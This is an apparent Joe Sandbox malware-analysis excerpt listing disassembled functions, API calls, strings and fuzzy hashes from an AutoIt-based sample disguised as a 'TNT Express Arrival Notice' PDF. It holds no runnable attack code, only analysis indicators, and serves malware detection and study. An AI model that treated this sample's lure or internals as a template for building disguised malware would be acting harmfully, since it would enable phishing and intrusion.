Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 460d53cb8bed2554e7553b4bd198b22d2a8f128f3ac1cb273d7a4bc5ea2c666a
Instruction ID: 81d051c31421e2800a6ae5610629b48becce3db68677e8c34be56ddf44ea04c2
Opcode Fuzzy Hash: 460d53cb8bed2554e7553b4bd198b22d2a8f128f3ac1cb273d7a4bc5ea2c666a
Instruction Fuzzy Hash: 5B1215756042019FDB54DF28C881E2AB7E5FF89714F14885CF89A9B3A2DB31ED41CB82

Function 0095091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009509C6
_wcslen.LIBCMT ref: 00950A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00950A54
_wcslen.LIBCMT ref: 00950A8A
_wcslen.LIBCMT ref: 00950B06
_wcslen.LIBCMT ref: 00950B81

Part of subcall function 008DF9F2: _wcslen.LIBCMT ref: 008DF9FD

Part of subcall function 00922BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00922BFA

Strings

CHECK, xrefs: 00950A85, 00950AA0
EXISTS, xrefs: 00950B7C, 00950B97
SELECT, xrefs: 00950D11
GETSELECTED, xrefs: 00950C4E
GETITEMCOUNT, xrefs: 00950C1E
ISCHECKED, xrefs: 00950CE1
EXPAND, xrefs: 00950BF8
GETTOTALCOUNT, xrefs: 009509F2, 00950A17
GETTEXT, xrefs: 00950C97
COLLAPSE, xrefs: 00950B01, 00950B1C
UNCHECK, xrefs: 00950D3E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 059ffd121e490cac0dab2f3f2fc13383b68068b5cafe6f508f7efa087e0c436d
Instruction ID: 8e3a25b768398e3c6e3e8fdfb7ac2a8bcf8116e61e83e696cc3542bb40cad083
Opcode Fuzzy Hash: 059ffd121e490cac0dab2f3f2fc13383b68068b5cafe6f508f7efa087e0c436d
Instruction Fuzzy Hash: EFE16D356083019FCB14EF2AC45092AB7E5FFD8315B14895DF8969B3A2DB31ED49CB82

Function 0094C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0094B6AE,?,?), ref: 0094C9B5
_wcslen.LIBCMT ref: 0094C9F1
_wcslen.LIBCMT ref: 0094CA68
_wcslen.LIBCMT ref: 0094CA9E
_wcslen.LIBCMT ref: 0094CAF9
_wcslen.LIBCMT ref: 0094CB2F
_wcslen.LIBCMT ref: 0094CB7F

Strings

HKCR, xrefs: 0094CB29, 0094CB2E
HKCC, xrefs: 0094CBAC
HKU, xrefs: 0094CBF0
HKEY_LOCAL_MACHINE, xrefs: 0094CA62, 0094CA67
HKLM, xrefs: 0094CA98, 0094CA9D
HKCU, xrefs: 0094CBCE
HKEY_CLASSES_ROOT, xrefs: 0094CAF3, 0094CAF8
HKEY_CURRENT_CONFIG, xrefs: 0094CB79, 0094CB7E
HKEY_CURRENT_USER, xrefs: 0094CBBD
HKEY_USERS, xrefs: 0094CBDF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: f44a582bfde7f7835b05b52a43a83280e4d7c551662bf567c7c4c4c8c9fde209
Instruction ID: 05c74c7f992f28e1a80380f719916e16d5e51ccfd88b1c0bcbd9ae75af18e701
Opcode Fuzzy Hash: f44a582bfde7f7835b05b52a43a83280e4d7c551662bf567c7c4c4c8c9fde209
Instruction Fuzzy Hash: 377118B260112A8FCB60EE7CC951DBE3399EF61754F250928FC66E7285EA35CD44C3A1

Function 0095833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0095835A
_wcslen.LIBCMT ref: 0095836E
_wcslen.LIBCMT ref: 00958391
_wcslen.LIBCMT ref: 009583B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009583F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00955BF2), ref: 0095844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00958487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009584CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00958501
FreeLibrary.KERNEL32(?), ref: 0095850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0095851D
DestroyIcon.USER32(?,?,?,?,?,00955BF2), ref: 0095852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00958549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00958555

Strings

.icl, xrefs: 00958368
.dll, xrefs: 009583AB
.exe, xrefs: 00958388

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: fd47a319a96d1c4c7425b1199630eb2ca14b230fbcdca69602ffc4b842c3094d
Instruction ID: f646cfdab922e4dc4a855028f5a743d3d4dc05f40b72053ec34b656420f4f725
Opcode Fuzzy Hash: fd47a319a96d1c4c7425b1199630eb2ca14b230fbcdca69602ffc4b842c3094d
Instruction Fuzzy Hash: F261CB71504205BAEB14DF66CC81BBF77A8FB04722F104549FC15E61E1EB74A984DBA0

Function 008C7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#ce, xrefs: 008C78ED
', xrefs: 00905169
Cannot parse #include, xrefs: 00905279
#comments-start, xrefs: 008C785F, 008C78B1
#requireadmin, xrefs: 008C77FF
#cs, xrefs: 008C7873, 008C78C5
#pragma compile, xrefs: 008C77D3
", xrefs: 00905153
#include, xrefs: 008C7847
Bad directive syntax error, xrefs: 0090519A
#OnAutoItStartRegister, xrefs: 008C7817
Unterminated group of comments, xrefs: 0090528C
#notrayicon, xrefs: 008C77E7
#include-once, xrefs: 008C782F
#comments-end, xrefs: 008C78D9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 8ec9679f1cca5ba471230ff666ee371584efd7f4cf11bdb62cc24987246cd21f
Instruction ID: f69c43deb084055d71a5a168c6b632f6b5bc00d2de6609b2db6d0777df350fb6
Opcode Fuzzy Hash: 8ec9679f1cca5ba471230ff666ee371584efd7f4cf11bdb62cc24987246cd21f
Instruction Fuzzy Hash: 5581C371604209AFDB20AF69DD52FAF37B8FF55304F044029F909EA196EB70DA15CB92

Function 00925A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00925A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00925A40
SetWindowTextW.USER32(?,?), ref: 00925A57
GetDlgItem.USER32(?,000003EA), ref: 00925A6C
SetWindowTextW.USER32(00000000,?), ref: 00925A72
GetDlgItem.USER32(?,000003E9), ref: 00925A82
SetWindowTextW.USER32(00000000,?), ref: 00925A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00925AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00925AC3
GetWindowRect.USER32(?,?), ref: 00925ACC
_wcslen.LIBCMT ref: 00925B33
SetWindowTextW.USER32(?,?), ref: 00925B6F
GetDesktopWindow.USER32 ref: 00925B75
GetWindowRect.USER32(00000000), ref: 00925B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00925BD3
GetClientRect.USER32(?,?), ref: 00925BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00925C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00925C2F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 881693205515058db52b9042bc2114e5b2ef1f67d79f678e37e206e2485c4e1a
Instruction ID: 6f1832751e71e3df3fc93e42bf62fb3cd4c55759db15e2aa90aed0fe2a62c011
Opcode Fuzzy Hash: 881693205515058db52b9042bc2114e5b2ef1f67d79f678e37e206e2485c4e1a
Instruction Fuzzy Hash: 1B71AE71900B19EFCB20DFA9DE85BAEBBF9FF48705F114918E182A25A4D774E940CB10

Function 008E00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008E00C6

Part of subcall function 008E00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0099070C,00000FA0,EA0A2554,?,?,?,?,009023B3,000000FF), ref: 008E011C
Part of subcall function 008E00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009023B3,000000FF), ref: 008E0127
Part of subcall function 008E00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009023B3,000000FF), ref: 008E0138
Part of subcall function 008E00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008E014E
Part of subcall function 008E00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008E015C
Part of subcall function 008E00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008E016A
Part of subcall function 008E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008E0195
Part of subcall function 008E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008E01A0

___scrt_fastfail.LIBCMT ref: 008E00E7

Part of subcall function 008E00A3: __onexit.LIBCMT ref: 008E00A9

Strings

InitializeConditionVariable, xrefs: 008E0148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 008E0122
WakeAllConditionVariable, xrefs: 008E0162
SleepConditionVariableCS, xrefs: 008E0154
kernel32.dll, xrefs: 008E0133

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 146c1856de84fca78c461dc4b5c2b30e0425d918f400583e5d1a4ea251bdbb2a
Instruction ID: a05cd869ac86ed76c71ebf3017c7d7bbe9d0457225605a0ff7966b7c2e2ca2b5
Opcode Fuzzy Hash: 146c1856de84fca78c461dc4b5c2b30e0425d918f400583e5d1a4ea251bdbb2a
Instruction Fuzzy Hash: 9821F97265D7506FDB105BBAAC05B2A33A4FB86B66F000536F901EB2D1DBB49C409F91

Function 009230F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092318D
_wcslen.LIBCMT ref: 009231F8

Strings

TEXT, xrefs: 0092347C
CLASS, xrefs: 00923188, 009231A5
INSTANCE, xrefs: 00923453
NAME, xrefs: 00923335, 00923346
CLASSNN, xrefs: 009231F3, 00923204
REGEXPCLASS, xrefs: 00923255, 00923266

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 22d4c62067032ae4f4124ce240a7cb87e531f311d0c91f34d4059284c11241d1
Instruction ID: e6681fdd8c68f5631c4c7d68649f33324ab7223a7f88beff60a5e8df090dce05
Opcode Fuzzy Hash: 22d4c62067032ae4f4124ce240a7cb87e531f311d0c91f34d4059284c11241d1
Instruction Fuzzy Hash: D5E10632A00626ABCB14EF68D441BEDBBB4FF54710F54C119E45AF3254DB38AF898790

Function 009344C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0095CC08), ref: 00934527
_wcslen.LIBCMT ref: 0093453B
_wcslen.LIBCMT ref: 00934599
_wcslen.LIBCMT ref: 009345F4
_wcslen.LIBCMT ref: 0093463F
_wcslen.LIBCMT ref: 009346A7

Part of subcall function 008DF9F2: _wcslen.LIBCMT ref: 008DF9FD

GetDriveTypeW.KERNEL32(?,00986BF0,00000061), ref: 00934743

Strings

fixed, xrefs: 00934635, 0093463A
unknown, xrefs: 00934708
cdrom, xrefs: 0093458F, 00934594
removable, xrefs: 009345EA, 009345EF
all, xrefs: 00934531, 00934536
ramdisk, xrefs: 009346F1
network, xrefs: 0093469D, 009346A2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 9c55e8c98a245af5f574735f6fb0a1ab7ef6235ec5df6ef69abf3ad21c6e80c0
Instruction ID: 4d2238328896b6ba6b0b94cea5ec7f12b5b0c9b168888974e905bb4736abea6c
Opcode Fuzzy Hash: 9c55e8c98a245af5f574735f6fb0a1ab7ef6235ec5df6ef69abf3ad21c6e80c0
Instruction Fuzzy Hash: 98B1D1716083029FC710EF28C891A6AB7E9FFA6764F51492DF496C7291E730E845CF92

Function 0094AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0094B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094B1D4
_wcslen.LIBCMT ref: 0094B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094B236
_wcslen.LIBCMT ref: 0094B332

Part of subcall function 009305A7: GetStdHandle.KERNEL32(000000F6), ref: 009305C6

_wcslen.LIBCMT ref: 0094B34B
_wcslen.LIBCMT ref: 0094B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094B3B6
GetLastError.KERNEL32(00000000), ref: 0094B407
CloseHandle.KERNEL32(?), ref: 0094B439
CloseHandle.KERNEL32(00000000), ref: 0094B44A
CloseHandle.KERNEL32(00000000), ref: 0094B45C
CloseHandle.KERNEL32(00000000), ref: 0094B46E
CloseHandle.KERNEL32(?), ref: 0094B4E3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 31843c883bc2f953963553f2a43a17b92a36f0a74d1738df9ce776d9e23b77a3
Instruction ID: 76191b7364104dcc01242a25a9ab0b0d4e40d686f1f7d110fa470658d7e223e3
Opcode Fuzzy Hash: 31843c883bc2f953963553f2a43a17b92a36f0a74d1738df9ce776d9e23b77a3
Instruction Fuzzy Hash: E2F156316083409FC724EF29C891F2ABBE5BF85314F14895DF8999B2A2DB31EC44CB52

Function 008C326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00991990), ref: 00902F8D
GetMenuItemCount.USER32(00991990), ref: 0090303D
GetCursorPos.USER32(?), ref: 00903081
SetForegroundWindow.USER32(00000000), ref: 0090308A
TrackPopupMenuEx.USER32(00991990,00000000,?,00000000,00000000,00000000), ref: 0090309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009030A9

Strings

0, xrefs: 008C327D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 94778daca839fb405708ffc8a2a1dd114bd1ec34627ae7415c2f54a873863b49
Instruction ID: 3f4aa33f233ca7cd97feafd47234b7be20759100a2ce6c9c9f50a4d31bdc3ece
Opcode Fuzzy Hash: 94778daca839fb405708ffc8a2a1dd114bd1ec34627ae7415c2f54a873863b49
Instruction Fuzzy Hash: 83710970644316BEEB258F69DC49FAABF78FF05368F204216F615AA1E0C7B1AD10DB50

Function 00956CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00956DEB

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00956E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00956E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00956E94
DestroyWindow.USER32(?), ref: 00956EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008C0000,00000000), ref: 00956EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00956EFD
GetDesktopWindow.USER32 ref: 00956F16
GetWindowRect.USER32(00000000), ref: 00956F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00956F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00956F4D

Part of subcall function 008D9944: GetWindowLongW.USER32(?,000000EB), ref: 008D9952

Strings

0, xrefs: 00956D98
tooltips_class32, xrefs: 00956E58, 00956EDD

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 66585d68d033479d1b4b4da6eca27ea47c0e08fb32ccd47ba6294fa21ae42b98
Instruction ID: 4277e71ba8653ccf5d106647fe9ae4b46149da624598adc58d2215404bd0dd03
Opcode Fuzzy Hash: 66585d68d033479d1b4b4da6eca27ea47c0e08fb32ccd47ba6294fa21ae42b98
Instruction Fuzzy Hash: 6D715674508345AFDB21CF19D848FAABBE9FB99305F44091EF98987261C770E90ADB12

Function 0095911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

DragQueryPoint.SHELL32(?,?), ref: 00959147

Part of subcall function 00957674: ClientToScreen.USER32(?,?), ref: 0095769A
Part of subcall function 00957674: GetWindowRect.USER32(?,?), ref: 00957710
Part of subcall function 00957674: PtInRect.USER32(?,?,00958B89), ref: 00957720

SendMessageW.USER32(?,000000B0,?,?), ref: 009591B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009591BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009591DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00959225
SendMessageW.USER32(?,000000B0,?,?), ref: 0095923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00959255
SendMessageW.USER32(?,000000B1,?,?), ref: 00959277
DragFinish.SHELL32(?), ref: 0095927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00959371

Strings

@GUI_DROPID, xrefs: 0095929E
@GUI_DRAGFILE, xrefs: 00959320
@GUI_DRAGID, xrefs: 009592E9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
